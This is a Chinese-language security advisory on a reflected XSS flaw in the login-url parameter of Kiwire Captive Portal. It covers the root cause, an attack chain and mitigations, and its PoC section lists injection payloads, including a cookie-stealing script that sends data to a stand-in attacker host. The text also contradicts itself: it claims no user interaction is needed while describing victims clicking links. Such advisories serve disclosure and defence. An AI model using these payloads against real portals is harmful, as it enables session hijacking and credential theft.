CVE-2025-11189：Kiwire Captive Portal 反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-11189

漏洞类型

反射型跨站脚本（Reflected XSS）

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Kiwire Captive Portal

漏洞概述

CVE-2025-11189是Kiwire Captive Portal（由Synchroweb开发的一款广泛部署的Captive Portal认证管理平台）中存在的一个反射型跨站脚本（Reflected XSS）漏洞。该漏洞由CERT/CC的研究员[email protected]发现并报告，于2025年10月10日正式公开披露。Kiwire Captive Portal主要用于公共场所（如酒店、机场、咖啡馆、企业网络等）的网络访问控制和用户认证管理，是网络基础设施中的重要组件。该漏洞存在于登录URL参数（login-url）中，攻击者可以通过构造恶意的URL链接，将JavaScript代码注入到参数中，当受害者点击该链接时，恶意脚本将在受害者的浏览器上下文中执行。由于该漏洞无需认证（PR:N）、无需用户交互（UI:N）即可触发，且可通过网络远程利用（AV:N），因此具有较高的攻击可达性和危害性。CVSS 3.1基础评分为7.3分，属于高危级别。尽管该漏洞对机密性、完整性和可用性的直接影响均为低级别（C:L/I:L/A:L），但XSS漏洞可被进一步利用进行会话劫持、钓鱼攻击、凭据窃取、恶意软件分发等更严重的攻击活动，对部署Kiwire Captive Portal的组织构成实质性安全威胁。受影响的组织应尽快评估其系统状态并采取相应的修复措施。

技术细节

该漏洞属于典型的反射型跨站脚本（Reflected XSS）漏洞，其根本原因在于Kiwire Captive Portal在处理用户提交的login-url参数时，未对该参数的内容进行充分的输入验证和输出编码。具体技术原理如下：

1. **注入点**：漏洞存在于登录页面的login-url参数中。当用户访问Captive Portal的登录页面时，该参数通常用于指定登录成功后的重定向目标URL。

2. **未过滤的用户输入**：应用程序直接将该参数的值反射回HTTP响应页面中（例如作为隐藏表单字段、JavaScript变量值或URL链接），而没有对特殊字符（如<、>、"、'、&等HTML/JS元字符）进行适当的转义或编码处理。

3. **恶意Payload构造**：攻击者可以构造包含JavaScript代码的恶意URL，例如：`https://target-kiwire-portal/login?login-url=javascript:alert(document.cookie)` 或在参数值中嵌入`<script>`标签及事件处理器。

4. **触发执行**：当受害者通过浏览器访问攻击者构造的恶意链接时，服务器将未经净化的参数值嵌入响应页面返回给浏览器，浏览器解析并执行其中的恶意JavaScript代码。

5. **攻击影响**：由于无需认证（PR:N）且无需用户交互（UI:N），攻击者可通过钓鱼邮件、即时消息等方式分发恶意链接。一旦受害者点击，攻击者可在其浏览器会话中执行任意JavaScript，包括窃取会话Cookie、劫持用户会话、窃取登录凭据、执行未授权操作，或进一步利用进行内网渗透。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过Shodan、Censys等网络空间搜索引擎，或通过公开的Synchroweb客户列表，识别暴露在互联网上的Kiwire Captive Portal实例。

STEP 2

步骤2：漏洞验证

攻击者向目标Kiwire Captive Portal的登录页面发送带有恶意XSS Payload的login-url参数请求，确认参数是否被未编码地反射到响应页面中。

STEP 3

步骤3：恶意链接构造

攻击者根据验证结果构造最终的恶意URL，将JavaScript代码嵌入login-url参数中，用于窃取会话Cookie或执行其他恶意操作。

STEP 4

步骤4：社工分发

攻击者通过钓鱼邮件、社交媒体、即时通讯工具等方式，将恶意链接分发给目标组织的员工或网络用户。

STEP 5

步骤5：受害者点击链接

受害者点击恶意链接，浏览器向Kiwire Captive Portal发送请求，服务器返回包含恶意JavaScript代码的响应页面。

STEP 6

步骤6：恶意脚本执行

浏览器解析响应页面并执行嵌入的恶意JavaScript代码，攻击者在受害者浏览器上下文中获得执行权限。

STEP 7

步骤7：数据窃取与权限提升

攻击者窃取受害者的会话Cookie、登录凭据或其他敏感信息，利用获取的会话权限进行未授权操作或进一步渗透。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
PoC for CVE-2025-11189: Kiwire Captive Portal Reflected XSS
Vulnerability Location: login-url parameter
-->

<!-- Attack Vector 1: Script Tag Injection -->
https://target-kiwire-portal.example.com/login?login-url="><script>alert(document.cookie)</script>

<!-- Attack Vector 2: Event Handler Injection -->
https://target-kiwire-portal.example.com/login?login-url=" onfocus="alert('XSS')" autofocus="x

<!-- Attack Vector 3: JavaScript Protocol Handler -->
https://target-kiwire-portal.example.com/login?login-url=javascript:alert(document.domain)

<!-- Attack Vector 4: Session Cookie Exfiltration (Real-world Exploitation) -->
<script>
  var img = new Image();
  img.src = "https://attacker-server.example.com/steal?cookie=" + document.cookie;
</script>
<!-- URL-encoded payload: -->
https://target-kiwire-portal.example.com/login?login-url="><script>var+img=new+Image();img.src="https://attacker-server.example.com/steal?cookie="+document.cookie;</script>

<!-- Attack Vector 5: cURL-based Testing -->
# curl "https://target-kiwire-portal.example.com/login?login-url=%22%3E%3Cscript%3Ealert(1)%3C/script%3E"
# Verify if the payload appears unescaped in the response body

影响范围

Kiwire Captive Portal（所有未修复的受影响版本，具体版本范围请参考厂商安全公告）

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1）通过Web应用防火墙（WAF）部署XSS防护规则，过滤login-url参数中的恶意JavaScript代码和HTML标签；2）实施Content Security Policy（CSP），限制页面脚本执行来源；3）为所有会话Cookie添加HttpOnly标志，防止通过XSS窃取会话；4）对暴露在互联网上的Kiwire Captive Portal实施网络访问控制，限制仅授权用户可访问；5）加强员工安全意识培训，警惕可疑链接；6）监控Captive Portal的访问日志，及时发现异常请求和潜在攻击行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11189
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11189
3 Details https://www.cvedetails.com/cve/CVE-2025-11189/
4 VulDB https://vuldb.com/cve/CVE-2025-11189
5 Link https://www.synchroweb.com/release-notes/kiwire/security
6 Link https://www.kb.cert.org/vuls/id/887923